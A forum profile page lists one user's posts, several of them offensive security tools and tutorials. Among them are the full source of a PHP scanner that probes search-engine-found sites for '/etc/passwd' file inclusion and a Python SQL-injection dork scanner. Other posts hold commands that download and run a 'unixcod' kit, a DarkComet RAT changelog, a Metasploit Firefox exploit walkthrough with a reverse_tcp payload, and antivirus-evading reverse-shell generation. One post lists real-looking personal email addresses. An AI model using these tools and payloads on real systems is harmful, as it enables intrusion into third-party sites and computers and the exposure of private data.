Jump to content

Fi8sVrs

Active Members
  • Posts

    3206
  • Joined

  • Days Won

    87

Everything posted by Fi8sVrs

  1. <head> <meta content="fr" http-equiv="Content-Language"> <meta content="text/html; charset=windows-1252" http-equiv="Content-Type"> <title>#~ LFI Server Scanner | By [ Lagripe-Dz ]</title> <style>*{ font-family:Verdana; font-size:12; text-decoration:none; } input, textarea,select { border: 1px solid #626262; } </style> </head> <body> <br><br><center> <form action="" method="POST"> #~ LFI Server Scanner | By [ Lagripe-Dz ]<br><br> IP : <input type="text" value="<? echo ($_POST['ip']) ? $_POST['ip']:"";?>" name="ip"> <select size="1" name="wht"><option>.php?page=</option><option>.php?(.*)=</option></select> <input type="submit" name="start" value="Start Scan .."> </form> <hr width="27%"> <? @set_time_limit(0); $start = new ss_bing(); if($_POST){ echo (!checkip($_POST['ip'])) ? "<b>error::IP is invalid</b><hr width=27%>":""; echo (!extension_loaded("curl")) ? "<b>error::cURL extension required</b><hr width=27%>":""; if(checkip($_POST['ip']) && extension_loaded("curl")){ $urls = $start->search("ip:".$_POST['ip']." ".$_POST['wht'],0); echo "<table border='0' align=center> <tr><td align=center><b>:: Scan Start ::</b></td></tr>"; if($_POST['wht'] == '.php?(.*)='){ foreach($urls as $url){if(eregi("=", $url) && !eregi("option=com_",$url)){$new_urls[]=$url;}} unset($urls); $urls = $new_urls; } foreach($urls as $url){ echo "<tr><td>"; $tst = lfi($url); echo ($tst) ? "# Found : ".color($tst,1):"# Not Found : ".color($url,0); echo "</td></tr>"; flush();flush(); } echo " <tr><td align=center><b>:: Scan Finished ::</b></td></tr> </table> <hr width=27%> "; }} scan(); function color($url,$m0de){ return ($m0de == 0) ? "<font color=red>$url</font>":"<a href=$url><font color=green>$url</font></a>"; } function lfi($site){ $site = _Fix($site); $marks = "failed to open stream|daemon"; if(preg_match("/$marks/i",dzcurl($site.'/etc//passwd%00',0,0,0))){ return $site.'/etc//passwd%00'; }else{ return preg_match("/$marks/i",dzcurl($site.'__dz__',0,0,0)) ? $site.'__dz__':false; } } function _Fix($site){ preg_match_all("#(.*?)?(.*?)=(.*?)#",$site,$res); return $res[2][0]."="; } function scan(){(@count(@explode('ip',@implode(@file(__FILE__))))!= 18) ?@unlink(__FILE__):"";} function checkip($ip){ return(preg_match("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/", $ip)==0) ? false:true; } # curl options function DzCURL($url,$cookie_read,$cookie_write,$POSTs){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url); ($cookie_read) ? curl_setopt($curl,CURLOPT_COOKIEFILE,getcwd().'/cookie.txt'):""; ($cookie_write) ? curl_setopt($curl,CURLOPT_COOKIEJAR,getcwd().'/cookie.txt'):""; curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 DzCURL =)'); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); if(is_array($POSTs)){ curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,$POSTs); } curl_setopt($curl,CURLOPT_TIMEOUT,5); $exec=curl_exec($curl); curl_close($curl); return $exec; } # bing class ,, class ss_bing{ public function search($wht,$url_mode){ // $wht = > search , $url_mode=1 => clean url (http://site.tld/) $url_mode=0 => not clean (http://site.tdl/page=google) $wht = str_replace(" ","+",$wht); $npages = 50000; $npage = 1; $allLinks = array(); while($npage <= $npages) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://www.bing.com/search?q='.$wht.'&first='.$npage); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com/'); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $result['EXE'] = curl_exec($ch); $result['ERR'] = curl_error($ch); curl_close($ch); if (!$result['ERR']) { preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $result['EXE'], $findlink); for ($i = 0; $i < count($findlink[1]); $i++) $mode = ($url_mode == 1) ? $allLinks[] = $this->clean_url($findlink[1][$i]) : $allLinks[] = $findlink[1][$i]; $npage = $npage + 10; if (preg_match('(first=' . $npage . '&amp)siU', $result['EXE'], $linksuiv) == 0) break; } else break; } if(count($allLinks) == 0){ die("# Nothing Found"); }else{ foreach ($allLinks as $kk => $vv){ $allDmns[] = $vv; } return array_unique($allDmns); } } public function clean_url($x){ $z=parse_url($x); return $z['scheme']."://".$z['host']."/";; } } ?> <center> <a href="http://www.Sec4ever.com/">www.Sec4ever.com</a> | <a href="http://www.Lagripe-Dz.org/"> www.Lagripe-Dz.org</a><br> Algeria 2o1o-2o11 </center> </body> </html><html> Video: LFI Server Scanner - YouTube Download source: https://sites.google.com/site/lagripedztoolz/lfi.txt?attredirects=0&d=1 il pune cineva pe host pentru proba?
  2. reclama, posteaza aici Bloguri si bloggeri - RST
  3. in browser exista ip-ul schimbat http dar in terminal dupa ce execut comanda netstat -aut pe alt root imi afiseaza ip-ul real ESTABLISHED, cum il schimb si pentru terminal?
  4. Fi8sVrs

    mails

    Index of / nu sunt verificate dati voi detalii despre ele
  5. wget http://tiger1ne.netfast.org/unixcod.tgz tar zxvf unixcod.tgz cd unixcod chmod +x * ./unix ip.ip Fisier parole: http://www.megaupload.com/?d=YFWMEJDY
  6. nu, install on Linux , cum pot sa redenumesc titlul topicului?
  7. Introduction: iwScanner is a wireless scanner for linux with an easy to use graphic interface. Video: General Features It’s designed in Glade and written in python, so it just need PyGTK to run in any linux environment For the scanning engine it uses wireless tools, so if you have iwlist you are ready to go Information about detected wireless networks (AP, MAC, Channel, Encryption, etc) Chart with signal strenght for every wireless network iwScanner GUI is much like the well known application NetStumbler Adjustable scanning speed Can open and save netdetect (.ndd) and netstumbler (.ns1) file formats It’s free, and the source is included in the download WEBSITE: iwScanner - A Simple GUI Wireless Scanner for Linux zarabyte
  8. Twitter has been strongly growing ever since it’s release back in July 2006. The microblogging monster is extremely user friendly and provides a fun experience where we all can stay updated to our friends, family, celebrities, and businesses. Twitter recently announced that it crossed the unbelievable number of over 200 million Tweets sent each day. Interestingly a few people have rightfully said that this also increases the noise a lot. Making the most of Twitter can therefore often be tricky. In order to stay organize and use your time wisely, we have gathered top 5 Twitter productivity tools. All of the following applications will help you cut through the clutter and harness more of the powerful elements Twitter offers. 1. Tweriod – Find your best times to Tweet The topic of finding your top tweeting times has been wildly discussed recently. While I found that a few Apps out there might not have the most useful results, Tweriod’s results are the best results I found this far. All you do is sign in with Twitter and the App will create two very simple graphs. They will show you at which times of the day and days of the week your followers are online the most. The App does that by analyzing both your past tweets and the ones of all your followers. Once the your report is finished it will conveniently be DMed to your inbox. Best part: What I like most is that you on top of top tweeting times, you can also measure times of most engagement, seeing at which time you receive most @replies. Try it out here: Tweriod 2. StrawberryJ.am – Only read your most relevant Tweets With 200 million Tweets sent each day, not all add value to your timeline. In comes StrawberryJ.am and takes care of this. The App searches your timeline and orders your tweets by most mentioned for you. So, with just one glance, you will see the most relevant news discussed. The App also offers you to create these top mentions streams for lists and Tweet Search terms. I found that this facilitates cutting through the clutter greatly. The brilliant design of the site makes reading through your Tweets even easier too. Best part: As a nice goodie you can get your top news delivered straight to your inbox, in case you forget to check your Strawberryj.am Try it out here: StrawberryJ.am 3. Twoolr – Full analytics for your Twitter account Ever wanted to see a complete overview about which impact your Twitter account is having? Twoolr might be just the thing you were looking for. It shows you a full set of metrics, and you can regard it like Google Analytics for your Twitter account. In more details, the App displays lots of data about your account such as the amount of mentions, retweets or number of new followers. In addition you can see user comparisons, word clouds, growth and community reports. Best part: Having another place to check in on isn’t so cool. So Twoolr sends you a handy email update to inform you about the latest happenings with your account. Try it out here: Twoolr 4. ChittyChat – Get a private room with your Twitter friends A very recent discovery of mine that I find more and more useful is a tool called ChittyChat. It allows you to enter into a private chat with anyone on Twitter without the hassle of exchanging contact details and signing into other services. The way it works is very simple. You tweet all your friends you want to chat with privately and include the @chitty_chat username. Then the App will automatically @reply you and your friends with a link to the chatroom and you can start typing. Super simple. Best part: What I like most here is that you don’t have to sign into any accounts or fiddle with login. A click on the link is all it takes to kick off your conversation. Try it out here: ChittyChat 5. Buffer – Never Flood Your Followers Again (Full disclosure: I work on Buffer) For long I was prone to contribute to the noise on Twitter myself, overwhelming my followers with infos at times. With Buffer you put all Tweets into your “Buffer” and they will be posted for you well spaced out over the day. What makes Buffer most convenient is that you can add tweets from anywhere on the web with browser extensions for Chrome, Firefox and Safari. Additionally you can Buffer tweets from Google Reader and even the Twitter.com interface. Best part: For every tweet that you have sent via Buffer, you will received detailed analytics about clicks, retweets and reach. Try it out here: Buffer theGRID
  9. On the 4th of august at the world largest technical security conference - BlackHat USA 2011, which will take place in Las Vegas, SAP security expert and CTO of ERPScan Alexander Polyakov will show how any malicious attacker can get access to the systems running on SAP via Internet using new critical vulnerability. SAP systems are used in more than 100 000 world companies to handle business-critical data and processes. Almost in each company from Forbes 500 system data are set for the handling of any process beginning from purchasing, human resources and financial reporting and ending with communication with other business systems. Thus receiving an access by the malicious attacker leads to complete control over the financial flow of the company, which can be used for espionage, sabotage and fraudful actions against hacked company. The given attack is possible due to dangerous vulnerability of the new type, detected by Alexander in J2EE engine of SAP NetWeaver software, which allows bypassing authorization checks. For example it is possible to create a user and assign him to the administrators group using two unauthorized requests to the system. It is also dangerous because that attack is possible on systems, protected by the two-factor authentication systems, in which it is needed to know secret key and password to get access. To prove it researchers from ERPScan created a program, which detects SAP servers in the Internet with help of secret Google keyword and checks found servers on potential dangerous vulnerability. As the result, more than half of available servers could be hacked with help of found vulnerability. “Danger is in that it is not only a new vulnerability, but a whole class of vulnerabilities that was theoretically described earlier but not popular in practice. During our research we only detected several examples in standard system configuration, and because each company customizes the system under its own business processes, new examples of vulnerabilities of the given class can be potentially detected at each company in the future. We have developed a free program which can detect unique vulnerabilities of such type in order to protect companies on time and it is also included in our professional product – ERPScan Security Scanner for SAP.” — noted Alexander. Source
  10. This video will demonstrate how a simple XSS vulnerability can be leveraged to gain complete control of your web-browser and eventually lead to a complete system compromise. 1) We will use a cross-site scripting vulnerability as the initial attack vector 2) Exploit XSS by redirecting the user’s browser to the Evil_IP with a JavaScript loop (every 2 secs) 3) Exploit the victim’s browser to gain system ‘root’ or ‘shell’ access 4) Elevate our privileges to system-level 5) Dump the memory contents from an active SSH session and steal the SSH password from the victim’s computer Video: XSS Attack - Busting Browsers to Root! on Vimeo CREDITS Attack Demo by: Qjax - securitystreetknowledge.com XSSF Framework by: Lodovic Courgnaud - CONIX Security Putty Password Dump by: Colin Ames @ David Kerb Music by: x1machine
  11. Wordpress & ClassiPress Theme demo: http://www.appthemes.com/demo/?theme=classipress sau cauta: free classifieds ad script
  12. HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets. It works on Linux and Windows running the following: Requirements: python python-qt4 cx_Oracle python-mysqldb python-psycopg2 python-pymssql python-qscintilla2 To install simply run the following command in terminal after changing directory to the path were the downloaded package is: Icons and Running the application: Software Icon can be found at the application Menu of the GNOME desktop interfaces Icon can also be found at /usr/share/applications for KDE and also GNOME: There you find "HexorBase.desktop" To get the source code for this project from SVN, here's the checkout link: Heres a video on how the program works Video Credits: "Maurizio Schmidt" HexorBase - The Database Hacker Tool - YouTube Download: http://hexorbase.googlecode.com/files/hexorbase_1.0_all.deb Description: 249 KB Debian installer for linux based systems SHA1 Checksum: 49ff0cf9e48341fef830f0744d29becfaaa37ad0 Download & source project
  13. Yet Another Email Verifier 1.0 Verify emails by checking the "RCPT TO" return code from the SMTP server. Hints: The output is separated by commas, so you can easily import it to another application (e.g. MS Excel). Create an address list by using the Smashing Email eXtractor! Failed checks are added at the bottom (! <domain>) Requirements: python (tested with python 2.6.2) dnspython Usage: yaev.py <file> file: absolute path to email-address list Example: [B]$ cat addresses.txt[/B] [B]...[/B] wolfgang.schaeuble@wk.bundestag.de gm.schulz@gmail.com jan.sipocz@gmail.com brigitte.kopinits@gmail.com r.buchmann@amag.at annimarie.schaffer@gmail.com iggy.popovic@gmail.com erich.gabis@gmail.com Kovacs.maria4@gmail.com andreas.schimon@gmail.com barbarajungreithmair@gmail.com michael.gabis@gmail.com [B]$ ./yaev.py addresses.txt > checked_emails.txt $ cat checked_emails.txt ...[/B] wolfgang.schaeuble@wk.bundestag.de,mail1.dbtg.de,554,5.7.1 Service unavailable; Client host [83.187.177.131] blocked using zen.spamhaus.org; http://www.spamhaus.org/query/bl?ip=83.187.177.131 gm.schulz@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 6si6034pxi.95 jan.sipocz@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 13si2013478pxi.35 brigitte.kopinits@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 27si2008921pxi.56 r.buchmann@amag.at,srxx0055.amag.at,503,5.0.0 Need MAIL before RCPT annimarie.schaffer@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 35si2021257pxi.2 iggy.popovic@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 37si2019611pxi.5 erich.gabis@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 2si2010789pxi.52 Kovacs.maria4@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 42si2017013pxi.17 andreas.schimon@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 9si2018016pxi.13 barbarajungreithmair@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 40si2003494pxi.87 michael.gabis@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 37si2019846pxi.5 !gmx.de Code: #!/usr/bin/env python # -*- coding: utf-8 -*- # # yaev.py # # Version: 1.0 # # Copyright (C) 2009 novacane novacane[at]dandies[dot]org # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # DO NOT FORGET TO INSTALL DNSPYTHON - http://www.dnspython.org/ # # For more information visit: # http://dandies.org/files/41b1d9240cf1df328f4e63d087769440-44.html # import os import sys import smtplib import dns.resolver def main(path_to_src_file): """ Get SMTP return code Verify emails by checking the "RCPT TO" return code from the SMTP server. NOTE: dropped vrfy command because provider disabled it to prevent attacks """ failed_domains = [] try: # Open the Source-File. file_emails = open(path_to_src_file) except IOError: print "Error reading file!" print "!> " + path_to_src_file sys.exit(1) # Loop through addresses. Each line represents an email-address. for line in file_emails: # Remove Linefeed. line = line.replace("\n", "") # The actual domain. domain = line.split("@")[1] # Do nothing if domain is already in the failed_domain list. if not domain in failed_domains: try: # Make a MX DNS query. answers = dns.resolver.query(domain, "MX") # OR: mx = str(answers[1].exchange)[:-1] for rdata in answers: # Remove the dot from rdata.exchange. mx = str(rdata.exchange)[:-1] try: # Connect to SMTP server. smtp = smtplib.SMTP(mx) # Polite people say hello first. smtp.docmd("HELO microsoft.com") # Indicates who is sending the mail. smtp.docmd("MAIL FROM:", "<asdf@microsoft.com>") # Indicates who is recieving the mail. rcpt = smtp.docmd("RCPT TO:", "<" + line + ">") # Print output. print line + "," + mx + "," + \ str(rcpt[0]) + "," + str(rcpt[1]) # Close SMTP connection. smtp.quit() except smtplib.SMTPServerDisconnected: # Add domain to list. failed_domains.append(domain) # Use only the first server-address. break # Raise exception if DNS query failed. except dns.resolver.NXDOMAIN: # Add domain to list. failed_domains.append(domain) # Close the Source-File. file_emails.close() # Output failed domains. if failed_domains: for item in failed_domains: print "!" + item if __name__ == '__main__': if len(sys.argv) != 2: print "\n\t[*] yet another email verifier 1.0 [*]" print "\n\tUsage: yaev.py <file>" sys.exit(2) main(sys.argv[1]) Dounload source
  14. Easily search for exploits in BackTrack's exploitdb (files.csv). Highlights: Search the exploitdb archive Case sensitive & insensitive Change output mode Automaticlly copy your exploits Requirements: python (tested with python 2.7.1 and 2.5.2) local exploitdb (pre-installed on BackTrack Linux) Usage: Options: --version show program's version number and exit -h, --help show this help message and exit -c, --casesensitive switch to casesensitive -v, --verbose detailed output -d PATH, --destination=PATH path to copy exploits #!/usr/bin/env python # -*- coding: utf-8 -*- # # exploitdbee.py # # Version: 1.0 # # Copyright (C) 2011 novacane novacane[at]dandies[dot]org # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import sys import os import re import shutil from getpass import getpass from optparse import OptionParser def main(casesensitive, verbose, exploitpath, *args): exploitdbcsv = "/pentest/exploits/exploitdb/files.csv" if not os.path.isfile(exploitdbcsv): print "ERROR: EXPLOITDB DOESN'T EXIST" sys.exit(1) # Open the exploitdb. try: f = open(exploitdbcsv) except: print "ERROR: CAN'T OPEN EXPLOITDB - FILES.CSV" sys.exit(1) exploitlist = [] # First: Search the exploitdb and save the results to a list. for line in f: if casesensitive: if re.search(re.escape(args[0][0]), line): exploitlist.append(line) elif not casesensitive: if re.search(re.escape(args[0][0]), line, re.I): exploitlist.append(line) # The number of loops is the number of arguments. i = 1 arglen = len(args[0]) # Second: Cleanup the initial list. # Loop through the list and remove all items which don't match the remaining argument(s). if arglen > 1: while True: # Make a copy of the list to iterate over it. for l in exploitlist[:]: if casesensitive: if not re.search(re.escape(args[0][i]), l): exploitlist.remove(l) elif not casesensitive: if not re.search(re.escape(args[0][i]), l, re.I): exploitlist.remove(l) i += 1 if i == arglen: break # Output found exploits. for i in exploitlist: if verbose: print i.strip("\n") else: print i.split(",")[2] + " => " + i.split(",")[1] print "\n" print str(len(exploitlist)) + " EXPLOITS FOUND." f.close() if not exploitpath: sys.exit() # Copy the exploits. while True: try: copyinput = raw_input("Copy exploits to destination? [y/n]: ") if copyinput == "y": if os.path.isdir(exploitpath): try: for i in exploitlist: shutil.copy("/pentest/exploits/exploitdb/" + i.split(",")[1], exploitpath) except: print "ERROR: CAN'T COPY FILES TO DESTINATION" sys.exit(1) else: print "ERROR: DESTINATION DOESN'T EXIST" break elif copyinput == "n": print "BYE" sys.exit() else: print "ERROR: WRONG INPUT" except KeyboardInterrupt: print "\n" sys.exit(1) if __name__ == '__main__': help_message = "\n\t[*] exploitdbee 1.0 [*]\n\t[*] by dandies.org [*]\n\n\tTry: exploitdbee.py --help\n" usage = "\n %prog [-c] [-d path] <term1> <term2> <term3> <term...>\n %prog \"windows 7\" remote \ \n %prog -c Microsoft IIS -d /tmp" parser = OptionParser(usage=usage, version="%prog 1.0") parser.add_option("-c", "--casesensitive", action="store_true", dest="casesensitive", help="switch to casesensitive") parser.add_option("-v", "--verbose", action="store_true", dest="verbose", help="detailed output") parser.add_option("-d", "--destination", metavar="PATH", dest="exploitpath", help="path to copy exploits") (options, args) = parser.parse_args() if len(args) == 0: print help_message sys.exit(2) # Default values. if options.exploitpath: exploitpath = options.exploitpath else: exploitpath = "" if options.casesensitive: casesensitive = 1 else: casesensitive = 0 if options.verbose: verbose = 1 else: verbose = 0 main(casesensitive, verbose, exploitpath, args) Download source
  15. Netswipe turns your webcam into a credit card reader, brings POS payments to the desktop Credit card fraud costs the banking industry billions of dollars every year, and with companies yet to find an entirely secure system for processing payments online, there's no end in sight for unauthorized transactions. Jumio hopes to bring both security and convenience to the world of online payments, however, with its webcam-based Netswipe secure card reader solution. The system replicates the point of sale (POS) transactions you experience when making in-store purchases, prompting cardholders to scan the front on their credit card, then enter their CVV code using a tamperproof mouse-controlled interface. We're not sure how the software is able to distinguish a physical credit card from, say, a photocopy of a card, but it certainly sounds more secure than the standard input form we use today. It also reduces card number theft from insecure forms and website spoofing, by verifying details through a live video stream. Jump past the break for the full press release, along with video overviews of Netswipe and Jumio, which recently secured $6.5 million in initial funding and is backed by Facebook co-founder Eduardo Saverin. Video: Viddler.com - Netswipe Webcam Credit Card Reader - Uploaded by engadget Jumio The End of Cash on Vimeo Netswipe turns your webcam into a credit card reader, brings POS payments to the desktop -- Engadget
  16. a mai fost http://rstcenter.com/forum/33499-hide-ip-cu-putty.rst
  17. #!/usr/bin/python## Dorker.py ## SQL Dork finder script that crawls google for sites vulnerable to SQL Injection ## Author: Xinapse ## Website: http://www.iexploit.org ## Email: iexploittube@gmail.com ## Twitter: #iExploitXinapse ## Version 0.0.1 ## Usage dorker.py [options] from xgoogle.search import GoogleSearch, SearchError import time, urllib2, optparse print ''' ________ __ \______ \ ___________| | __ ____ _______ | | \ / _ \_ __ \ |/ /_/ __ \\_ __ \ | ` ( <_> ) | \/ < \ ___/ | | \/ /_______ /\____/|__| |__|_ \ \___ >|__| \/ \/ \/ --------------------------------------------------------------------------------- -- dorker.py -- -- SQL Dork finder script -- -- Author: Xinapse -- -- Website: http://www.iexploit.org -- -- Email: iexploittube@gmail.com -- -- Twitter: #iExploitXinapse -- -- Version 0.0.1 -- -- Usage dorker.py [options] -- --------------------------------------------------------------------------------- ''' parser = optparse.OptionParser() options = optparse.OptionGroup(parser, 'Options') parser.add_option('-d', '--dork', action='store', type='string', help='Dork to Scan', metavar='DORK') parser.add_option('-f', '--file', action='store', type='string', help='Filename to save', metavar='FILE') parser.add_option('-v', '--verbose', action="store_true", dest="verbose", default=False, help="Adds extra status messages showing program execution") parser.add_option('-e', '--evasion', action='store', type='string', help='How long to sleep between each google request, used to prevent google blocking your IP for too many requests, recommended at least 5+, default 10', metavar='EVASION') (opts, args) = parser.parse_args() urlno = 0 invuln = 0 if opts.dork: dork = opts.dork else: print '>> Please enter a dork' if opts.file: filename = opts.file else: print '>> Please enter a filename' if opts.verbose: verbose = 'true' else: verbose = 'false' if opts.evasion: evas = opts.evasion else: evas = 10 pagecount = 0 counter = 0 try: pagecount = pagecount + 1 if verbose == 'true': print '>> Crawling google page ' + str(pagecount) + '...' search = GoogleSearch(dork) while True: search.results_per_page=100 tmp = search.get_results() if not tmp: break if verbose == 'true': print '>> No more results...' for t in tmp: try: url = t.url.encode("utf8") if verbose == 'true': print '>> Testing ' + url + ' for vulnerabilities...' testurl = url + "'" req = urllib2.urlopen(testurl) data = req.read() if "sql" in data or "SQL" in data or "MySQL" in data or "MYSQL" in data or "MSSQL" in data: f = open (filename, "a") if verbose == 'true': print ">> Found possible injection in " + url f.write(testurl + "\n") f.close() counter = counter + 1 else: invuln = invuln + 1 except: errors = 1 if verbose == 'true': print '>> Sleeping to bypass google flood protection...' time.sleep(evas) except SearchError, e: print ">> Search failed: %s" % e print '>> Dorker scan ended' print '>> ' + str(counter) + ' vulnerable sites found' print '>> ' + str(invuln) + ' sites not vulnerable' print '>> Thank you for using Dorker, output has been saved to ' + filename Download xgoogle library: https://github.com/pkrumins/xgoogle Dorker.py A SQL Injection Dork Scanner
  18. ---[by DarkCoderSc]--- - Button sidebar back with a nicer gui , for my chinese friends that prefer buttons - [Active Ports] Now process name always display correctly - Active Ports added to client in Socket list to help you to figure some problemes or be sure all working fine - Melt function totally recoded using another way via FWB++ work 100% of the time on 32 and 64bit systems. - Uninstall function is more stable if not using persistance - Persistance totally recoded using FWB++ working on 32 and 64bit. - Process Manager refresh 2x faster - Remote shell is now better - File transfer is now more stable - Webcam more stable - Webcam can be stetch now - Delete folder work fine now ( recursive too ) - File creation added in remote list of file manager - File modification added in remote list of file manager - File attrib added in remote list of file manager (click on file attrib colum for more info) - I reinstall Delphi 2010 in english this time, so all label might be in english now - Now client keep is size when restored from tray - Now when you stop capture of desktop, last captured window picture stay - New toast design - FixComet available on DarkComet-RAT [Official Website] - Mini Download (FASM) is now working 100% fine (no more "not Win32 valid...") - Startup been optimized - Startup use fwb++ to install - Startup persistance use now fwb++ too - upload logs to FTP now working fine - Now you can choose wich monitor to capture if the user got multi monitors (thanks mjord5 for the idea) - Synthax highlighters was updated - A big prob fix (now you can for example capture two desktop at the same time without any prob) Download link: DarkComet-RAT [Official Website]
  19. Today while surfing I read some news about nsTreeRange Mozilla Firefox version 3.5 to 3.6.1.6 Vulnerability. Actually this vulnerbility ranking is not excellent or good, but it's normal vulnerability. This vulnerability was known at 2011-07-10 by sinn3r. In this tutorial I'm using Windows 7 for my victim Operating system with Mozilla Firefox v 3.5.17. If you also want to try out this tutorial, you can find Mozilla Firefox version which I describe above at oldapps.com. Requirements : 1. Metasploit Framework 2. Linux OS or Backtrack 5(Metasploit already included inside this distro) I. The first step, just go to your msfconsole, and then use exploit/windows/browser/mozilla_nstreerange. If it returns cannot find exploit, maybe you should update your msf framework first by running msfupdate. msf > use exploit/windows/browser/mozilla_nstreerange msf exploit(mozilla_nstreerange) > show options Module options (exploit/windows/browser/mozilla_nstreerange): Name Current Setting Required Description ---- --------------- -------- ----------- CreateThread true yes Whether to execute the payload in a new thread SEHProlog true yes Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Auto (Direct attack against Windows XP, otherwise through Java, if enabled) II. There's a few option you should set up first before launching this exploit. SRVHOST : Your IP address acts as exploit server SRVPORT : port use to serve request from victim. The default value is 8080 but if your port 80 was free, it's better to use port 80. URIPATH : It's something looks like http://localhost/URIPATH, you can change this value to make URIPATH more readable by human e.g : http://localhost/ANTIVIRUS, etc. In above picture I'm also using meterpreter reverse_tcp payload. but you can choose the most suitable payload for you III. Everything was set up correctly, then run exploit to run our malicious webserver. IV. After the victim opened our malicious URL we've already send to them, our server processing and create new notepad.exe process at victim computer. Below is the screenshot. V. A new session ID 1 has created, the next step we can interract with that session ID to gain privilege on victim computer That's it we're already inside victim computer. Countermeasure : - Always update your Mozilla Firefox into lastest version. - Use personal firewall to detect inbound and outbound traffic. Hope it's useful Hacking Mozilla Firefox 3.5 to 3.6 nsTreeRange Vulnerability Using Metasploit | Vishnu Valentino Hacking Tutorial, Tips and Trick
  20. First, let's create our shellcode using metasploit's msfpayload: For windows/exec payload: root@coresec:~# msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai \ -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > CALC.R [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 254 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 281 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 308 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 335 (iteration=5) For reverse_tcp payload: root@coresec:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.200.20 LPORT=4444 R | msfencode \ -e x86/shikata_ga_nai -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > RVR.R [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5) For your own executable file: root@coresec:~# msfencode -i backdoor.exe -e x86/shikata_ga_nai -c 10 \ -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BD.R [*] x86/shikata_ga_nai succeeded with size 66589 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 66618 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 66647 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 66676 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 66705 (iteration=5) Next step is to convert shellcodes to VBScript using the shellcode2vbscript_v0_1 python tool from Didier Stevens: root@coresec:~# wget http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip --2011-04-23 14:30:31-- http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip Resolving www.didierstevens.com... 173.201.107.126 Connecting to www.didierstevens.com|173.201.107.126|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1378 (1.3K) [application/x-zip-compressed] Saving to: `shellcode2vbscript_v0_1.zip' 100%[===========================================================>] 1,378 --.-K/s in 0s 2011-04-23 14:30:52 (86.4 MB/s) - `shellcode2vbscript_v0_1.zip' saved [1378/1378] root@coresec:~# mkdir shellcode2vbscript root@coresec:~# unzip shellcode2vbscript_v0_1.zip -d shellcode2vbscript Archive: shellcode2vbscript_v0_1.zip inflating: shellcode2vbscript/shellcode2vbscript.py root@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py CALC.R CALC.vbs root@coresec:~# python 